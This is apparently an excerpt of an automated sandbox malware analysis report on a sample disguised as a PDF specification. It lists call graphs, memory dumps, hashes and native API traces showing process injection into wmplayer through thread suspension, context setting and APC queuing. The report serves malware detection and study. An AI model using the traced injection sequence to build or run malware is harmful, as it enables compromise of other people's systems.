            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3168844106-0
            • Opcode ID: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
            • Instruction ID: c13685da94ac064b601b6b4a00d687cdf3b99873ac190f32b0b06a94e36cbaee
            • Opcode Fuzzy Hash: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
            • Instruction Fuzzy Hash: F3212C23E7C90681EAD0AB64E8903B4B354EF107A4FD80332C56DA75E5DF6CE1A5C3A1

            Execution Graph

            Execution Coverage:1.8%
            Dynamic/Decrypted Code Coverage:5.4%
            Signature Coverage:8%
            Total number of Nodes:577
            Total number of Limit Nodes:70
            execution_graph 88987 41f140 88990 41b940 88987->88990 88991 41b966 88990->88991 88998 409d40 88991->88998 88993 41b972 88994 41b993 88993->88994 89006 40c1c0 88993->89006 88996 41b985 89042 41a680 88996->89042 89045 409c90 88998->89045 89000 409d54 89000->88993 89001 409d4d 89001->89000 89057 409c30 89001->89057 89007 40c1e5 89006->89007 89484 40b1c0 89007->89484 89009 40c23c 89488 40ae40 89009->89488 89011 40c4b3 89011->88996 89012 40c262 89012->89011 89497 4143a0 89012->89497 89014 40c2a7 89014->89011 89500 408a60 89014->89500 89016 40c2eb 89016->89011 89507 41a4d0 89016->89507 89020 40c341 89021 40c348 89020->89021 89519 419fe0 89020->89519 89022 41bda0 2 API calls 89021->89022 89024 40c355 89022->89024 89024->88996 89026 40c392 89027 41bda0 2 API calls 89026->89027 89028 40c399 89027->89028 89028->88996 89029 40c3a2 89030 40f4a0 3 API calls 89029->89030 89031 40c416 89030->89031 89031->89021 89032 40c421 89031->89032 89033 41bda0 2 API calls 89032->89033 89034 40c445 89033->89034 89524 41a030 89034->89524 89037 419fe0 2 API calls 89038 40c480 89037->89038 89038->89011 89529 419df0 89038->89529 89041 41a680 2 API calls 89041->89011 89043 41a69f ExitProcess 89042->89043 89044 41af30 LdrLoadDll 89042->89044 89044->89043 89076 418b90 89045->89076 89049 409cb6 89049->89001 89050 409cac 89050->89049 89083 41b280 89050->89083 89052 409cf3 89052->89049 89094 409ab0 89052->89094 89054 409d13 89100 409620 LdrLoadDll 89054->89100 89056 409d25 89056->89001 89459 41b570 89057->89459 89060 41b570 LdrLoadDll 89061 409c5b 89060->89061 89062 41b570 LdrLoadDll 89061->89062 89063 409c71 89062->89063 89064 40f180 89063->89064 89065 40f199 89064->89065 89467 40b040 89065->89467 89067 40f1ac 89471 41a1b0 89067->89471 89071 40f1d2 89074 40f1fd 89071->89074 89477 41a230 89071->89477 89073 41a460 2 API calls 89075 409d65 89073->89075 89074->89073 89075->88993 89077 418b9f 89076->89077 89101 414e50 89077->89101 89079 409ca3 89080 418a40 89079->89080 89107 41a5d0 89080->89107 89084 41b299 89083->89084 89114 414a50 89084->89114 89086 41b2b1 89087 41b2ba 89086->89087 89153 41b0c0 89086->89153 89087->89052 89089 41b2ce 89089->89087 89175 419ed0 89089->89175 89097 409aca 89094->89097 89437 407ea0 89094->89437 89096 409ad1 89096->89054 89097->89096 89450 408160 89097->89450 89100->89056 89102 414e5e 89101->89102 89103 414e6a 89101->89103 89102->89103 89106 4152d0 LdrLoadDll 89102->89106 89103->89079 89105 414fbc 89105->89079 89106->89105 89109 418a55 89107->89109 89110 41af30 89107->89110 89109->89050 89111 41af40 89110->89111 89113 41af62 89110->89113 89112 414e50 LdrLoadDll 89111->89112 89112->89113 89113->89109 89115 414d85 89114->89115 89117 414a64 89114->89117 89115->89086 89117->89115 89183 419c20 89117->89183 89119 414b90 89186 41a330 89119->89186 89120 414b73 89243 41a430 LdrLoadDll 89120->89243 89123 414b7d 89123->89086 89124 414bb7 89125 41bda0 2 API calls 89124->89125 89127 414bc3 89125->89127 89126 414d49 89129 41a460 2 API calls 89126->89129 89127->89123 89127->89126 89128 414d5f 89127->89128 89133 414c52 89127->89133 89252 414790 LdrLoadDll NtReadFile NtClose 89128->89252 89130 414d50 89129->89130 89130->89086 89132 414d72 89132->89086 89134 414cb9 89133->89134 89135 414c61 89133->89135 89134->89126 89136 414ccc 89134->89136 89137 414c66 89135->89137 89138 414c7a 89135->89138 89245 41a2b0 89136->89245 89244 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 89137->89244 89142 414c97 89138->89142 89143 414c7f 89138->89143 89142->89130 89201 414410 89142->89201 89189 4146f0 89143->89189 89145 414c70 89145->89086 89147 414d2c 89249 41a460 89147->89249 89148 414c8d 89148->89086 89151 414caf 89151->89086 89152 414d38 89152->89086 89154 41b0d1 89153->89154 89155 41b0e3 89154->89155 89270 41bd20 89154->89270 89155->89089 89157 41b104 89273 414070 89157->89273 89159 41b150 89159->89089 89160 41b127 89160->89159 89161 414070 3 API calls 89160->89161 89162 41b149 89161->89162 89162->89159 89300 41bb20 89162->89300 89165 41b166 89305 415390 89165->89305 89166 41b1da 89167 41b1ea 89166->89167 89402 41aed0 LdrLoadDll 89166->89402 89315 41b040 89167->89315 89170 41b20e 89318 41ad40 89170->89318 89172 41b218 89397 419e90 89172->89397 89176 41af30 LdrLoadDll 89175->89176 89177 419eec 89176->89177 89431 3872c0a 89177->89431 89178 419f07 89180 41bda0 89178->89180 89434 41a640 89180->89434 89182 41b329 89182->89052 89184 41af30 LdrLoadDll 89183->89184 89185 414b44 89184->89185 89185->89119 89185->89120 89185->89123 89187 41a34c NtCreateFile 89186->89187 89188 41af30 LdrLoadDll 89186->89188 89187->89124 89188->89187 89190 41470c 89189->89190 89191 41a2b0 LdrLoadDll 89190->89191 89192 41472d 89191->89192 89193 414734 89192->89193 89194 414748 89192->89194 89196 41a460 2 API calls 89193->89196 89195 41a460 2 API calls 89194->89195 89197 414751 89195->89197 89198 41473d 89196->89198 89253 41bfb0 LdrLoadDll RtlAllocateHeap 89197->89253 89198->89148 89200 41475c 89200->89148 89202 41445b 89201->89202 89203 41448e 89201->89203 89204 41a2b0 LdrLoadDll 89202->89204 89205 4145d9 89203->89205 89209 4144aa 89203->89209 89206 414476 89204->89206 89207 41a2b0 LdrLoadDll 89205->89207 89208 41a460 2 API calls 89206->89208 89213 4145f4 89207->89213 89210 41447f 89208->89210 89211 41a2b0 LdrLoadDll 89209->89211 89210->89151 89212 4144c5 89211->89212 89215 4144e1 89212->89215 89216 4144cc 89212->89216 89266 41a2f0 LdrLoadDll 89213->89266 89219 4144e6 89215->89219 89220 4144fc 89215->89220 89218 41a460 2 API calls 89216->89218 89217 41462e 89221 41a460 2 API calls 89217->89221 89222 4144d5 89218->89222 89223 41a460 2 API calls 89219->89223 89228 414501 89220->89228 89254 41bf70 89220->89254 89224 414639 89221->89224 89222->89151 89225 4144ef 89223->89225 89224->89151 89225->89151 89236 414513 89228->89236 89257 41a3e0 89228->89257 89229 414567 89230 41457e 89229->89230 89265 41a270 LdrLoadDll 89229->89265 89231 414585 89230->89231 89232 41459a 89230->89232 89234 41a460 2 API calls 89231->89234 89235 41a460 2 API calls 89232->89235 89234->89236 89237 4145a3 89235->89237 89236->89151 89238 4145cf 89237->89238 89260 41bb70 89237->89260 89238->89151 89240 4145ba 89241 41bda0 2 API calls 89240->89241 89242 4145c3 89241->89242 89242->89151 89243->89123 89244->89145 89246 41af30 LdrLoadDll 89245->89246 89247 414d14 89246->89247 89248 41a2f0 LdrLoadDll 89247->89248 89248->89147 89250 41a47c NtClose 89249->89250 89251 41af30 LdrLoadDll 89249->89251 89250->89152 89251->89250 89252->89132 89253->89200 89267 41a600 89254->89267 89256 41bf88 89256->89228 89258 41af30 LdrLoadDll 89257->89258 89259 41a3fc NtReadFile 89258->89259 89259->89229 89262 41bb76 89260->89262 89261 41bb94 89261->89240 89262->89261 89263 41bf70 2 API calls 89262->89263 89264 41bbab 89263->89264 89264->89240 89265->89230 89266->89217 89268 41af30 LdrLoadDll 89267->89268 89269 41a61c RtlAllocateHeap 89268->89269 89269->89256 89271 41bd4d 89270->89271 89403 41a510 89270->89403 89271->89157 89274 414081 89273->89274 89275 414089 89273->89275 89274->89160 89276 41bb20 2 API calls 89275->89276 89277 414093 89276->89277 89278 41435c 89277->89278 89407 41cf10 89277->89407 89278->89160 89280 4140dd 89281 41cf10 2 API calls 89280->89281 89285 4140e8 89281->89285 89282 414136 89284 41cf10 2 API calls 89282->89284 89287 41414a 89284->89287 89285->89282 89412 41cfb0 89285->89412 89286 41cf10 2 API calls 89289 4141bd 89286->89289 89287->89286 89288 41cf10 2 API calls 89297 414205 89288->89297 89289->89288 89291 414334 89419 41cf70 LdrLoadDll RtlFreeHeap 89291->89419 89293 41433e 89420 41cf70 LdrLoadDll RtlFreeHeap 89293->89420 89295 414348 89421 41cf70 LdrLoadDll RtlFreeHeap 89295->89421 89418 41cf70 LdrLoadDll RtlFreeHeap 89297->89418 89298 414352 89422 41cf70 LdrLoadDll RtlFreeHeap 89298->89422 89302 41bb2a 89300->89302 89301 41bb44 89301->89165 89302->89165 89302->89301 89303 41bf70 2 API calls 89302->89303 89304 41bbab 89303->89304 89304->89165 89306 4153a1 89305->89306 89307 414a50 8 API calls 89306->89307 89309 4153b7 89307->89309 89308 41540a 89308->89166 89309->89308 89310 4153f2 89309->89310 89311 415405 89309->89311 89312 41bda0 2 API calls 89310->89312 89313 41bda0 2 API calls 89311->89313 89314 4153f7 89312->89314 89313->89308 89314->89166 89316 41bb20 2 API calls 89315->89316 89317 41b054 89316->89317 89317->89170 89423 41ac00 89318->89423 89321 41ac00 2 API calls 89322 41ad5d 89321->89322 89323 41ac00 2 API calls 89322->89323 89324 41ad66 89323->89324 89325 41ac00 2 API calls 89324->89325 89326 41ad6f 89325->89326 89327 41ac00 2 API calls 89326->89327 89328 41ad78 89327->89328 89329 41ac00 2 API calls 89328->89329 89330 41ad81 89329->89330 89331 41ac00 2 API calls 89330->89331 89332 41ad8d 89331->89332 89333 41ac00 2 API calls 89332->89333 89334 41ad96 89333->89334 89335 41ac00 2 API calls 89334->89335 89336 41ad9f 89335->89336 89337 41ac00 2 API calls 89336->89337 89338 41ada8 89337->89338 89339 41ac00 2 API calls 89338->89339 89340 41adb1 89339->89340 89341 41ac00 2 API calls 89340->89341 89342 41adba 89341->89342 89343 41ac00 2 API calls 89342->89343 89344 41adc6 89343->89344 89345 41ac00 2 API calls 89344->89345 89346 41adcf 89345->89346 89347 41ac00 2 API calls 89346->89347 89348 41add8 89347->89348 89349 41ac00 2 API calls 89348->89349 89350 41ade1 89349->89350 89351 41ac00 2 API calls 89350->89351 89352 41adea 89351->89352 89353 41ac00 2 API calls 89352->89353 89354 41adf3 89353->89354 89355 41ac00 2 API calls 89354->89355 89356 41adff 89355->89356 89357 41ac00 2 API calls 89356->89357 89358 41ae08 89357->89358 89359 41ac00 2 API calls 89358->89359 89360 41ae11 89359->89360 89361 41ac00 2 API calls 89360->89361 89362 41ae1a 89361->89362 89363 41ac00 2 API calls 89362->89363 89364 41ae23 89363->89364 89365 41ac00 2 API calls 89364->89365 89366 41ae2c 89365->89366 89367 41ac00 2 API calls 89366->89367 89368 41ae38 89367->89368 89369 41ac00 2 API calls 89368->89369 89370 41ae41 89369->89370 89371 41ac00 2 API calls 89370->89371 89372 41ae4a 89371->89372 89373 41ac00 2 API calls 89372->89373 89374 41ae53 89373->89374 89375 41ac00 2 API calls 89374->89375 89376 41ae5c 89375->89376 89377 41ac00 2 API calls 89376->89377 89378 41ae65 89377->89378 89379 41ac00 2 API calls 89378->89379 89380 41ae71 89379->89380 89381 41ac00 2 API calls 89380->89381 89382 41ae7a 89381->89382 89383 41ac00 2 API calls 89382->89383 89384 41ae83 89383->89384 89385 41ac00 2 API calls 89384->89385 89386 41ae8c 89385->89386 89387 41ac00 2 API calls 89386->89387 89388 41ae95 89387->89388 89389 41ac00 2 API calls 89388->89389 89390 41ae9e 89389->89390 89391 41ac00 2 API calls 89390->89391 89392 41aeaa 89391->89392 89393 41ac00 2 API calls 89392->89393 89394 41aeb3 89393->89394 89395 41ac00 2 API calls 89394->89395 89396 41aebc 89395->89396 89396->89172 89398 41af30 LdrLoadDll 89397->89398 89399 419eac 89398->89399 89430 3872df0 LdrInitializeThunk 89399->89430 89400 419ec3 89400->89089 89402->89167 89404 41af30 LdrLoadDll 89403->89404 89405 41a52c NtAllocateVirtualMemory 89404->89405 89405->89271 89408 41cf20 89407->89408 89409 41cf26 89407->89409 89408->89280 89410 41bf70 2 API calls 89409->89410 89411 41cf4c 89410->89411 89411->89280 89413 41cfd5 89412->89413 89414 41d00d 89412->89414 89415 41bf70 2 API calls 89413->89415 89414->89285 89416 41cfea 89415->89416 89417 41bda0 2 API calls 89416->89417 89417->89414 89418->89291 89419->89293 89420->89295 89421->89298 89422->89278 89424 41bb20 2 API calls 89423->89424 89425 41ac1b 89424->89425 89426 414e50 LdrLoadDll 89425->89426 89427 41ac3b 89426->89427 89428 414e50 LdrLoadDll 89427->89428 89429 41ace7 89427->89429 89428->89429 89429->89321 89430->89400 89432 3872c11 89431->89432 89433 3872c1f LdrInitializeThunk 89431->89433 89432->89178 89433->89178 89435 41af30 LdrLoadDll 89434->89435 89436 41a65c RtlFreeHeap 89435->89436 89436->89182 89438 407eb0 89437->89438 89439 407eab 89437->89439 89440 41bd20 2 API calls 89438->89440 89439->89097 89443 407ed5 89440->89443 89441 407f38 89441->89097 89442 419e90 2 API calls 89442->89443 89443->89441 89443->89442 89444 407f3e 89443->89444 89449 41bd20 2 API calls 89443->89449 89453 41a590 89443->89453 89445 407f64 89444->89445 89447 41a590 2 API calls 89444->89447 89445->89097 89448 407f55 89447->89448 89448->89097 89449->89443 89451 40817e 89450->89451 89452 41a590 2 API calls 89450->89452 89451->89054 89452->89451 89454 41a5ac 89453->89454 89455 41af30 LdrLoadDll 89453->89455 89458 3872c70 LdrInitializeThunk 89454->89458 89455->89454 89456 41a5c3 89456->89443 89458->89456 89460 41b593 89459->89460 89463 40acf0 89460->89463 89464 40ad14 89463->89464 89465 40ad50 LdrLoadDll 89464->89465 89466 409c4a 89464->89466 89465->89466 89466->89060 89468 40b063 89467->89468 89470 40b0e0 89468->89470 89482 419c60 LdrLoadDll 89468->89482 89470->89067 89472 41af30 LdrLoadDll 89471->89472 89473 40f1bb 89472->89473 89473->89075 89474 41a7a0 89473->89474 89475 41a7bf LookupPrivilegeValueW 89474->89475 89476 41af30 LdrLoadDll 89474->89476 89475->89071 89476->89475 89478 41a24c 89477->89478 89479 41af30 LdrLoadDll 89477->89479 89483 3872ea0 LdrInitializeThunk 89478->89483 89479->89478 89480 41a26b 89480->89074 89482->89470 89483->89480 89485 40b1f0 89484->89485 89486 40b040 LdrLoadDll 89485->89486 89487 40b204 89486->89487 89487->89009 89489 40ae51 89488->89489 89490 40ae4d 89488->89490 89491 40ae6a 89489->89491 89492 40ae9c 89489->89492 89490->89012 89534 419ca0 LdrLoadDll 89491->89534 89535 419ca0 LdrLoadDll 89492->89535 89494 40aead 89494->89012 89496 40ae8c 89496->89012 89498 4143c6 89497->89498 89499 40f4a0 3 API calls 89497->89499 89498->89014 89499->89498 89536 4087a0 89500->89536 89503 408a9d 89503->89016 89504 4087a0 19 API calls 89505 408a8a 89504->89505 89505->89503 89554 40f710 10 API calls 89505->89554 89508 41af30 LdrLoadDll 89507->89508 89509 41a4ec 89508->89509 89674 3872e80 LdrInitializeThunk 89509->89674 89510 40c322 89512 40f4a0 89510->89512 89513 40f4bd 89512->89513 89675 419f90 89513->89675 89516 40f505 89516->89020 89517 419fe0 2 API calls 89518 40f52e 89517->89518 89518->89020 89520 419ffc 89519->89520 89521 41af30 LdrLoadDll 89519->89521 89681 3872d10 LdrInitializeThunk 89520->89681 89521->89520 89522 40c385 89522->89026 89522->89029 89525 41af30 LdrLoadDll 89524->89525 89526 41a04c 89525->89526 89682 3872d30 LdrInitializeThunk 89526->89682 89527 40c459 89527->89037 89530 41af30 LdrLoadDll 89529->89530 89531 419e0c 89530->89531 89683 3872fb0 LdrInitializeThunk 89531->89683 89532 40c4ac 89532->89041 89534->89496 89535->89494 89537 407ea0 4 API calls 89536->89537 89551 4087ba 89537->89551 89538 408a49 89538->89503 89538->89504 89539 408a3f 89540 408160 2 API calls 89539->89540 89540->89538 89543 419ed0 2 API calls 89543->89551 89547 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 89547->89551 89550 419df0 2 API calls 89550->89551 89551->89538 89551->89539 89551->89543 89551->89547 89551->89550 89552 41a460 LdrLoadDll NtClose 89551->89552 89555 419ce0 89551->89555 89558 4085d0 89551->89558 89570 40f5f0 LdrLoadDll NtClose 89551->89570 89571 419d60 LdrLoadDll 89551->89571 89572 419d90 LdrLoadDll 89551->89572 89573 419e20 LdrLoadDll 89551->89573 89574 4083a0 89551->89574 89590 405f60 LdrLoadDll 89551->89590 89552->89551 89554->89503 89556 419cfc 89555->89556 89557 41af30 LdrLoadDll 89555->89557 89556->89551 89557->89556 89559 4085e6 89558->89559 89591 419850 89559->89591 89561 4085ff 89566 408771 89561->89566 89612 4081a0 89561->89612 89563 4086e5 89564 4083a0 11 API calls 89563->89564 89563->89566 89565 408713 89564->89565 89565->89566 89567 419ed0 2 API calls 89565->89567 89566->89551 89568 408748 89567->89568 89568->89566 89569 41a4d0 2 API calls 89568->89569 89569->89566 89570->89551 89571->89551 89572->89551 89573->89551 89575 4083c9 89574->89575 89653 408310 89575->89653 89578 41a4d0 2 API calls 89579 4083dc 89578->89579 89579->89578 89580 408467 89579->89580 89583 408462 89579->89583 89661 40f670 89579->89661 89580->89551 89581 41a460 2 API calls 89582 40849a 89581->89582 89582->89580 89584 419ce0 LdrLoadDll 89582->89584 89583->89581 89585 4084ff 89584->89585 89585->89580 89665 419d20 89585->89665 89587 408563 89587->89580 89588 414a50 8 API calls 89587->89588 89589 4085b8 89588->89589 89589->89551 89590->89551 89592 41bf70 2 API calls 89591->89592 89593 419867 89592->89593 89619 409310 89593->89619 89595 419882 89596 4198c0 89595->89596 89597 4198a9 89595->89597 89599 41bd20 2 API calls 89596->89599 89598 41bda0 2 API calls 89597->89598 89600 4198b6 89598->89600 89601 4198fa 89599->89601 89600->89561 89602 41bd20 2 API calls 89601->89602 89604 419913 89602->89604 89603 419bb4 89610 41bda0 2 API calls 89603->89610 89604->89603 89625 41bd60 89604->89625 89607 419ba0 89608 41bda0 2 API calls 89607->89608 89609 419baa 89608->89609 89609->89561 89611 419c09 89610->89611 89611->89561 89613 40829f 89612->89613 89614 4081b5 89612->89614 89613->89563 89614->89613 89615 414a50 8 API calls 89614->89615 89616 408222 89615->89616 89617 41bda0 2 API calls 89616->89617 89618 408249 89616->89618 89617->89618 89618->89563 89620 409335 89619->89620 89621 40acf0 LdrLoadDll 89620->89621 89622 409368 89621->89622 89624 40938d 89622->89624 89629 40cf20 89622->89629 89624->89595 89626 41bd6e 89625->89626 89647 41a550 89626->89647 89630 40cf4c 89629->89630 89631 41a1b0 LdrLoadDll 89630->89631 89632 40cf65 89631->89632 89633 40cf6c 89632->89633 89640 41a1f0 89632->89640 89633->89624 89637 40cfa7 89638 41a460 2 API calls 89637->89638 89639 40cfca 89638->89639 89639->89624 89641 41a20c 89640->89641 89642 41af30 LdrLoadDll 89640->89642 89646 3872ca0 LdrInitializeThunk 89641->89646 89642->89641 89643 40cf8f 89643->89633 89645 41a7e0 LdrLoadDll 89643->89645 89645->89637 89646->89643 89648 41af30 LdrLoadDll 89647->89648 89649 41a56c 89648->89649 89652 3872f90 LdrInitializeThunk 89649->89652 89650 419b99 89650->89603 89650->89607 89652->89650 89654 408328 89653->89654 89655 40acf0 LdrLoadDll 89654->89655 89656 408343 89655->89656 89657 414e50 LdrLoadDll 89656->89657 89658 408353 89657->89658 89659 40835c PostThreadMessageW 89658->89659 89660 408370 89658->89660 89659->89660 89660->89579 89662 40f683 89661->89662 89668 419e60 89662->89668 89666 41af30 LdrLoadDll 89665->89666 89667 419d3c 89666->89667 89667->89587 89669 419e7c 89668->89669 89670 41af30 LdrLoadDll 89668->89670 89673 3872dd0 LdrInitializeThunk 89669->89673 89670->89669 89671 40f6ae 89671->89579 89673->89671 89674->89510 89676 419fac 89675->89676 89677 41af30 LdrLoadDll 89675->89677 89680 3872f30 LdrInitializeThunk 89676->89680 89677->89676 89678 40f4fe 89678->89516 89678->89517 89680->89678 89681->89522 89682->89527 89683->89532 89684 3b5cb84 89687 3b5a042 89684->89687 89686 3b5cba5 89688 3b5a06b 89687->89688 89689 3b5a182 NtQueryInformationProcess 89688->89689 89697 3b5a577 89688->89697 89690 3b5a1ba 89689->89690 89691 3b5a2fc NtSuspendThread 89690->89691 89693 3b5a1ef 89690->89693 89692 3b5a30d 89691->89692 89694 3b5a331 89691->89694 89692->89686 89693->89686 89696 3b5a4a6 NtSetContextThread 89694->89696 89699 3b5a4f2 89694->89699 89695 3b5a552 NtResumeThread NtClose 89695->89697 89698 3b5a4bd 89696->89698 89697->89686 89698->89699 89700 3b5a4da NtQueueApcThread 89698->89700 89699->89695 89700->89699 89701 3872ad0 LdrInitializeThunk

            Control-flow Graph

            APIs
            • NtQueryInformationProcess.NTDLL ref: 03B5A19F
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1378179664.0000000003B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B50000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3b50000_wmplayer.jbxd
            Similarity
            • API ID: InformationProcessQuery
            • String ID: 0
            • API String ID: 1778838933-4108050209
            • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
            • Instruction ID: fe86786f4c5832d5b1a285b74f8fc25fdfde47cd1f2bdde7bdabb2d8f9f0dccb
            • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
            • Instruction Fuzzy Hash: 20F11274518A4C8FDBA9EF68C894BEEB7E1FB98304F40466EE84ADB250DF349541CB41

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 102 41a3e0-41a429 call 41af30 NtReadFile
            APIs
            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID: 1JA$rMA$rMA
            • API String ID: 2738559852-782607585
            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
            • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
            • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

            Control-flow Graph

            APIs
            • NtQueryInformationProcess.NTDLL ref: 03B5A19F
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1378179664.0000000003B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B50000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3b50000_wmplayer.jbxd
            Similarity
            • API ID: InformationProcessQuery
            • String ID: 0
            • API String ID: 1778838933-4108050209
            • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
            • Instruction ID: 24bf1bf6b5c27c49f61c9cf846298b5c733c67a4e3f4567ea584b8ef5eea10bb
            • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
            • Instruction Fuzzy Hash: F2511C70914A8C8FDB69EF68C8946EEBBF4FB98305F40466EE84AD7250DF309645CB41

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 427 41a50b-41a50c 428 41a532-41a54d NtAllocateVirtualMemory 427->428 429 41a50e 427->429 430 41a510-41a52f call 41af30 429->430 431 41a49e-41a4cd call 41af30 429->431 430->428
            APIs
            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: 91f17fc03be1c6747b1fc9bee7c40ba965fbc622912273113a84b9d04876119d
            • Instruction ID: 3b53d873a9165450f84cb1ae017c97b0e812d24917ad5496a9c091630dbac56c
            • Opcode Fuzzy Hash: 91f17fc03be1c6747b1fc9bee7c40ba965fbc622912273113a84b9d04876119d
            • Instruction Fuzzy Hash: DD011BB6211208ABCB14DF89DC81DEB73ADAF8C354F118249FE0997201C634F961CBB5

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 452 40acf0-40ad0c 453 40ad14-40ad19 452->453 454 40ad0f call 41cc30 452->454 455 40ad1b-40ad1e 453->455 456 40ad1f-40ad2d call 41d050 453->456 454->453 459 40ad3d-40ad4e call 41b470 456->459 460 40ad2f-40ad3a call 41d2d0 456->460 465 40ad50-40ad64 LdrLoadDll 459->465 466 40ad67-40ad6a 459->466 460->459 465->466
            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
            • Instruction ID: 7435202e8c2424d374e436f157d00fb34b53d81c2f6da2748dfdf88e1812e125
            • Opcode Fuzzy Hash: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
            • Instruction Fuzzy Hash: C9015EB6D0020DBBDB10DBA1DC42FDEB3789F54308F0041AAA908A7281F634EB54CB95

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 476 41a32b-41a381 call 41af30 NtCreateFile
            APIs
            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: a686a4656c35774f8a8092ee5b481a9c1be533b027609282a4e80265cdab0862
            • Instruction ID: 9d0f9c1f54d28a393aa803b44fa7df7ada7850a5eacac906beb4a27e83d22564
            • Opcode Fuzzy Hash: a686a4656c35774f8a8092ee5b481a9c1be533b027609282a4e80265cdab0862
            • Instruction Fuzzy Hash: 5D01BDB2211108AFCB48CF99DD85EEB77A9AF8C754F158248FA1DD7240CA30E851CBA4

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 479 41a330-41a346 480 41a34c-41a381 NtCreateFile 479->480 481 41a347 call 41af30 479->481 481->480
            APIs
            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
            • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
            • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
            APIs
            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
            Memory Dump Source
